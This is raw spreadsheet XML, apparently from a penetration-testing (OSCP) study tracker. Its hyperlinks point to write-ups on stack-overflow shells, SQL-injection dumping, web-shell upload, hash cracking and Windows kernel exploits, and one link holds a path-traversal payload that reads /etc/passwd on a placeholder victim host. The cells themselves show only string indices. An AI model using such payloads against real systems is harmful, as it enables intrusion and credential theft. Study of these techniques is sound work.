Target="https://blackwintersecurity.com/oscp/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@codingkarma/free-float-ftp-pop-calc-exe-via-stack-overflow-3be11ce23570%20(THIS%20ONE%20GIVES%20US%20A%20SHELL)"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resources.infosecinstitute.com/dumping-a-database-using-sql-injection/%0aThe%20above%20site%20has%20a%20list%20of%20all%20strings%20we%20can%20use%20to%20confirm%20sql%20injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/5.5/en/password-hashing.html%0ahttps:/null-byte.wonderhowto.com/how-to/crack-shadow-hashes-after-getting-root-linux-system-0186386/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings5.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/%0ahttps:/cyberbotnet.com/2020-04-09/Upload-Web-Shell-Using-SQLmap"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hyperlink" Target="https://github.com/njahrckstr/Windows_Kernel_Sploit_List"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http://victim.site/articles.php?id=../../../../../../../../../../etc/passwd"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59999389629810485"/>
  </sheetPr>
  <dimension ref="A1:I587"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="64" zoomScaleNormal="64" workbookViewId="0">
      <pane ySplit="26" topLeftCell="A183" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E186" sqref="E186"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15.75" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="28.140625" style="15" customWidth="1"/>
    <col min="2" max="2" width="16.42578125" style="15" customWidth="1"/>
    <col min="3" max="3" width="25.85546875" style="15" customWidth="1"/>
    <col min="4" max="4" width="25.7109375" style="15" customWidth="1"/>
    <col min="5" max="5" width="32.5703125" style="6" customWidth="1"/>
    <col min="6" max="6" width="23.140625" style="6" customWidth="1"/>
    <col min="7" max="7" width="131.28515625" style="6" customWidth="1"/>
    <col min="8" max="8" width="115.7109375" style="6" customWidth="1"/>
    <col min="9" max="9" width="20.140625" style="6" customWidth="1"/>
    <col min="10" max="16384" width="9.140625" style="6"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" s="1" customFormat="1" ht="36.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="16" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="11"/>
      <c r="C1" s="16" t="s">
        <v>1</v>
      </c>
      <c r="D1"/>
      <c r="E1"/>
      <c r="F1" s="9" t="s">
        <v>2</v>
      </c>
      <c r="G1"/>
    </row>
    <row r="2" spans="1:7" s="1" customFormat="1" ht="26.45" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A2" s="16" t="s">
        <v>3</v>
      </c>
      <c r="B2" s="12" t="s">
        <v>4</v>
      </c>
      <c r="C2" s="16" t="s">
        <v>5</v>
      </c>
      <c r="D2" s="12" t="s">
        <v>6</v>
      </c>
      <c r="E2" s="1" t="s">
        <v>6</v>
      </c>
      <c r="F2" s="9" t="s">
        <v>7</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="3" spans="1:7" s="3" customFormat="1" ht="26.45" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A3" s="17"/>
      <c r="B3" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C3" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D3" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4" spans="1:7" s="3" customFormat="1" ht="26.45" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A4" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C4" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D4" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G4" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="5" spans="1:7" s="3" customFormat="1" ht="26.45" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A5" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C5" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D5" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G5" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6" spans="1:7" s="3" customFormat="1" ht="26.45" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A6" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B6" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C6" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D6" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G6" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="7" spans="1:7" s="3" customFormat="1" ht="26.45" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A7" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B7" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C7" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D7" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G7" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="8" spans="1:7" s="3" customFormat="1" ht="26.45" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A8" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B8" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C8" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D8" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G8" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="9" spans="1:7" s="3" customFormat="1" ht="26.45" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A9" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B9" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C9" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D9" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E9" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G9" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="10" spans="1:7" s="3" customFormat="1" ht="26.45" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A10" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B10" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C10" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D10" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E10" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F10" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G10" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="11" spans="1:7" s="3" customFormat="1" ht="34.9" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A11" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B11" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C11" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D11" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E11" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G11" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="12" spans="1:7" s="3" customFormat="1" ht="34.9" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A12" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B12" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C12" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D12" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E12" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F12" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G12" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="13" spans="1:7" s="3" customFormat="1" ht="34.9" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A13" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B13" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C13" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D13" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E13" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G13" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="14" spans="1:7" s="3" customFormat="1" ht="34.9" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A14" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B14" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C14" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D14" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E14" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F14" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G14" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="15" spans="1:7" s="3" customFormat="1" ht="12.75" x14ac:dyDescent="0.2">
      <c r="A15" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B15" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C15" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D15" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E15" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G15" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="16" spans="1:7" s="3" customFormat="1" ht="12.75" x14ac:dyDescent="0.2">
      <c r="A16" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B16" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C16" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D16" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E16" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F16" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G16" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="17" spans="1:9" s="3" customFormat="1" ht="12.75" x14ac:dyDescent="0.2">
      <c r="A17" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B17" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C17" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D17" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E17" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G17" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="18" spans="1:9" s="3" customFormat="1" ht="12.75" x14ac:dyDescent="0.2">
      <c r="A18" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B18" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C18" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D18" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E18" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F18" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G18" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="19" spans="1:9" s="3" customFormat="1" ht="12.75" hidden="1" x14ac:dyDescent="0.2">
      <c r="A19" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B19" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C19" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D19" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E19" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F19" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G19" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="20" spans="1:9" s="3" customFormat="1" ht="16.149999999999999" hidden="1" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A20" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B20" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C20" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D20" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E20" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F20" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G20" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="21" spans="1:9" s="3" customFormat="1" ht="16.149999999999999" hidden="1" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A21" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B21" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C21" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D21" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E21" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F21" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G21" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="22" spans="1:9" s="3" customFormat="1" ht="16.149999999999999" hidden="1" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A22" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B22" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C22" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D22" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E22" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F22" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G22" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="23" spans="1:9" s="3" customFormat="1" ht="16.149999999999999" hidden="1" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A23" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B23" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C23" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D23" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E23" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F23" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G23" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="24" spans="1:9" s="3" customFormat="1" ht="16.149999999999999" hidden="1" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A24" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B24" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C24" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D24" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E24" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F24" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G24" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="25" spans="1:9" s="3" customFormat="1" ht="7.5" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A25" s="17" t="s">
        <v>6</v>
      </c>
      <c r="B25" s="13" t="s">
        <v>6</v>
      </c>
      <c r="C25" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D25" s="13" t="s">
        <v>6</v>
      </c>
      <c r="E25" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F25" s="4" t="s">
        <v>6</v>
      </c>
      <c r="G25" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="26" spans="1:9" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A26" s="19" t="s">
        <v>22781</v>
      </c>
      <c r="B26" s="14" t="s">
        <v>9</v>
      </c>
      <c r="C26" s="20" t="s">
        <v>10</v>
      </c>
      <c r="D26" s="21" t="s">
        <v>11</v>
      </c>
      <c r="E26" s="5" t="s">
        <v>12</v>
      </c>
      <c r="F26" s="186" t="s">
        <v>13</v>
      </c>
      <c r="G26" s="185" t="s">
        <v>14</v>
      </c>
      <c r="H26" s="185" t="s">
        <v>15</v>
      </c>
      <c r="I26" s="185" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="27" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A27" s="10"/>
      <c r="B27" s="10"/>
      <c r="C27" s="10"/>
      <c r="D27" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E27" s="10" t="s">
        <v>18</v>
      </c>
      <c r="F27" s="10" t="s">
        <v>19</v>
      </c>
      <c r="G27" s="8"/>
      <c r="H27" s="8"/>
      <c r="I27" s="8"/>
    </row>
    <row r="28" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A28" s="10"/>
      <c r="B28" s="10"/>
      <c r="C28" s="10"/>
      <c r="D28" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E28" s="10" t="s">
        <v>20</v>
      </c>
      <c r="F28" s="10" t="s">
        <v>19</v>
      </c>
      <c r="G28" s="8"/>
      <c r="H28" s="8"/>
      <c r="I28" s="8"/>
    </row>
    <row r="29" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A29" s="10"/>
      <c r="B29" s="10"/>
      <c r="C29" s="10"/>
      <c r="D29" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E29" s="10" t="s">
        <v>18</v>
      </c>
      <c r="F29" s="10" t="s">
        <v>21</v>
      </c>
      <c r="G29" s="8"/>
      <c r="H29" s="8"/>
      <c r="I29" s="8"/>
    </row>
    <row r="30" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A30" s="10"/>
      <c r="B30" s="10"/>
      <c r="C30" s="10"/>
      <c r="D30" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E30" s="10" t="s">
        <v>20</v>
      </c>
      <c r="F30" s="10" t="s">
        <v>21</v>
      </c>
      <c r="G30" s="8"/>
      <c r="H30" s="8"/>
      <c r="I30" s="8"/>
    </row>
    <row r="31" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A31" s="212" t="s">
        <v>22</v>
      </c>
      <c r="D31" s="15" t="s">
        <v>23</v>
      </c>
      <c r="G31" s="6" t="s">
        <v>24</v>
      </c>
      <c r="H31" s="6" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="32" spans="1:9" ht="263.45" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A32" s="212" t="s">
        <v>22</v>
      </c>
      <c r="B32" s="189"/>
      <c r="C32" s="189" t="s">
        <v>26</v>
      </c>
      <c r="D32" s="189" t="s">
        <v>27</v>
      </c>
      <c r="E32" s="190" t="s">
        <v>28</v>
      </c>
      <c r="F32" s="190"/>
      <c r="G32" s="8" t="s">
        <v>22787</v>
      </c>
      <c r="H32" s="199" t="s">
        <v>29</v>
      </c>
      <c r="I32" s="191"/>
    </row>
    <row r="33" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A33" s="189"/>
      <c r="B33" s="189"/>
      <c r="C33" s="189"/>
      <c r="D33" s="189"/>
      <c r="E33" s="190"/>
      <c r="F33" s="190"/>
      <c r="G33" s="191"/>
      <c r="H33" s="191"/>
      <c r="I33" s="191"/>
    </row>
    <row r="34" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A34" s="189"/>
      <c r="B34" s="189"/>
      <c r="C34" s="189"/>
      <c r="D34" s="189"/>
      <c r="E34" s="190"/>
      <c r="F34" s="190"/>
      <c r="G34" s="191"/>
      <c r="H34" s="191"/>
      <c r="I34" s="191"/>
    </row>
    <row r="35" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A35" s="189"/>
      <c r="B35" s="189"/>
      <c r="C35" s="189"/>
      <c r="D35" s="189"/>
      <c r="E35" s="190"/>
      <c r="F35" s="190"/>
      <c r="G35" s="191"/>
      <c r="H35" s="191"/>
      <c r="I35" s="191"/>
    </row>
    <row r="36" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A36" s="189"/>
      <c r="B36" s="189"/>
      <c r="C36" s="189"/>
      <c r="D36" s="189"/>
      <c r="E36" s="190"/>
      <c r="F36" s="190"/>
      <c r="G36" s="191"/>
      <c r="H36" s="191"/>
      <c r="I36" s="191"/>
    </row>
    <row r="37" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A37" s="189"/>
      <c r="B37" s="189"/>
      <c r="C37" s="189"/>
      <c r="D37" s="189"/>
      <c r="E37" s="190"/>
      <c r="F37" s="190"/>
      <c r="G37" s="191"/>
      <c r="H37" s="191"/>
      <c r="I37" s="191"/>
    </row>
    <row r="38" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A38" s="189"/>
      <c r="B38" s="189"/>
      <c r="C38" s="189"/>
      <c r="D38" s="189"/>
      <c r="E38" s="190"/>
      <c r="F38" s="190"/>
      <c r="G38" s="191"/>
      <c r="H38" s="191"/>
      <c r="I38" s="191"/>
    </row>
    <row r="39" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A39" s="189"/>
      <c r="B39" s="189"/>
      <c r="C39" s="189"/>
      <c r="D39" s="189"/>
      <c r="E39" s="190"/>
      <c r="F39" s="190"/>
      <c r="G39" s="191"/>
      <c r="H39" s="191"/>
      <c r="I39" s="191"/>
    </row>
    <row r="40" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A40" s="189"/>
      <c r="B40" s="189"/>
      <c r="C40" s="189"/>
      <c r="D40" s="189"/>
      <c r="E40" s="190"/>
      <c r="F40" s="190"/>
      <c r="G40" s="191"/>
      <c r="H40" s="191"/>
      <c r="I40" s="191"/>
    </row>
    <row r="41" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A41" s="189"/>
      <c r="B41" s="189"/>
      <c r="C41" s="189"/>
      <c r="D41" s="189"/>
      <c r="E41" s="190"/>
      <c r="F41" s="190"/>
      <c r="G41" s="191"/>
      <c r="H41" s="191"/>
      <c r="I41" s="191"/>
    </row>
    <row r="42" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A42" s="189"/>
      <c r="B42" s="189"/>
      <c r="C42" s="189"/>
      <c r="D42" s="189"/>
      <c r="E42" s="190"/>
      <c r="F42" s="190"/>
      <c r="G42" s="191"/>
      <c r="H42" s="191"/>
      <c r="I42" s="191"/>
    </row>
    <row r="43" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A43" s="189"/>
      <c r="B43" s="189"/>
      <c r="C43" s="189"/>
      <c r="D43" s="189"/>
      <c r="E43" s="190"/>
      <c r="F43" s="190"/>
      <c r="G43" s="191"/>
      <c r="H43" s="191"/>
      <c r="I43" s="191"/>
    </row>
    <row r="44" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A44" s="189"/>
      <c r="B44" s="189"/>
      <c r="C44" s="189"/>
      <c r="D44" s="189"/>
      <c r="E44" s="190"/>
      <c r="F44" s="190"/>
      <c r="G44" s="191"/>
      <c r="H44" s="191"/>
      <c r="I44" s="191"/>
    </row>
    <row r="45" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A45" s="189"/>
      <c r="B45" s="189"/>
      <c r="C45" s="189"/>
      <c r="D45" s="189"/>
      <c r="E45" s="190"/>
      <c r="F45" s="190"/>
      <c r="G45" s="191"/>
      <c r="H45" s="191"/>
      <c r="I45" s="191"/>
    </row>
    <row r="46" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A46" s="189"/>
      <c r="B46" s="189"/>
      <c r="C46" s="189"/>
      <c r="D46" s="189"/>
      <c r="E46" s="190"/>
      <c r="F46" s="190"/>
      <c r="G46" s="191"/>
      <c r="H46" s="191"/>
      <c r="I46" s="191"/>
    </row>
    <row r="47" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A47" s="189"/>
      <c r="B47" s="189"/>
      <c r="C47" s="189"/>
      <c r="D47" s="189"/>
      <c r="E47" s="190"/>
      <c r="F47" s="190"/>
      <c r="G47" s="191"/>
      <c r="H47" s="191"/>
      <c r="I47" s="191"/>
    </row>
    <row r="48" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A48" s="10" t="s">
        <v>30</v>
      </c>
      <c r="B48" s="10" t="s">
        <v>31</v>
      </c>
      <c r="C48" s="10" t="s">
        <v>32</v>
      </c>
      <c r="D48" s="10" t="s">
        <v>33</v>
      </c>
      <c r="E48" s="10"/>
      <c r="F48" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G48" s="8" t="s">
        <v>35</v>
      </c>
      <c r="H48" s="8" t="s">
        <v>36</v>
      </c>
      <c r="I48" s="8"/>
    </row>
    <row r="49" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A49" s="10" t="s">
        <v>37</v>
      </c>
      <c r="B49" s="10" t="s">
        <v>38</v>
      </c>
      <c r="C49" s="10" t="s">
        <v>39</v>
      </c>
      <c r="D49" s="10" t="s">
        <v>40</v>
      </c>
      <c r="E49" s="10"/>
      <c r="F49" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G49" s="8" t="s">
        <v>41</v>
      </c>
      <c r="H49" s="8" t="s">
        <v>42</v>
      </c>
      <c r="I49" s="8"/>
    </row>
    <row r="50" spans="1:9" ht="123.95" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A50" s="10" t="s">
        <v>37</v>
      </c>
      <c r="B50" s="10" t="s">
        <v>43</v>
      </c>
      <c r="C50" s="10" t="s">
        <v>43</v>
      </c>
      <c r="D50" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E50" s="10" t="s">
        <v>18</v>
      </c>
      <c r="F50" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G50" s="8" t="s">
        <v>44</v>
      </c>
      <c r="H50" s="8"/>
      <c r="I50" s="8"/>
    </row>
    <row r="51" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A51" s="10" t="s">
        <v>43</v>
      </c>
      <c r="B51" s="10" t="s">
        <v>38</v>
      </c>
      <c r="C51" s="10" t="s">
        <v>39</v>
      </c>
      <c r="D51" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E51" s="10" t="s">
        <v>18</v>
      </c>
      <c r="F51" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G51" s="8" t="s">
        <v>45</v>
      </c>
      <c r="H51" s="8"/>
      <c r="I51" s="8"/>
    </row>
    <row r="52" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A52" s="10" t="s">
        <v>43</v>
      </c>
      <c r="B52" s="10" t="s">
        <v>38</v>
      </c>
      <c r="C52" s="10" t="s">
        <v>46</v>
      </c>
      <c r="D52" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E52" s="10" t="s">
        <v>18</v>
      </c>
      <c r="F52" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G52" s="8" t="s">
        <v>47</v>
      </c>
      <c r="H52" s="8"/>
      <c r="I52" s="8"/>
    </row>
    <row r="53" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A53" s="10" t="s">
        <v>43</v>
      </c>
      <c r="B53" s="10" t="s">
        <v>31</v>
      </c>
      <c r="C53" s="10" t="s">
        <v>48</v>
      </c>
      <c r="D53" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E53" s="10" t="s">
        <v>18</v>
      </c>
      <c r="F53" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G53" s="8" t="s">
        <v>49</v>
      </c>
      <c r="H53" s="8"/>
      <c r="I53" s="8"/>
    </row>
    <row r="54" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A54" s="10" t="s">
        <v>30</v>
      </c>
      <c r="B54" s="10" t="s">
        <v>31</v>
      </c>
      <c r="C54" s="10" t="s">
        <v>48</v>
      </c>
      <c r="D54" s="10" t="s">
        <v>50</v>
      </c>
      <c r="E54" s="10"/>
      <c r="F54" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G54" s="8" t="s">
        <v>51</v>
      </c>
      <c r="H54" s="8"/>
      <c r="I54" s="8"/>
    </row>
    <row r="55" spans="1:9" ht="15.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A55" s="10" t="s">
        <v>37</v>
      </c>
      <c r="B55" s="10" t="s">
        <v>38</v>
      </c>
      <c r="C55" s="10" t="s">
        <v>52</v>
      </c>
      <c r="D55" s="10" t="s">
        <v>53</v>
      </c>
      <c r="E55" s="10"/>
      <c r="F55" s="10" t="s">
        <v>54</v>
      </c>
      <c r="G55" s="8" t="s">
        <v>55</v>
      </c>
      <c r="H55" s="8" t="s">
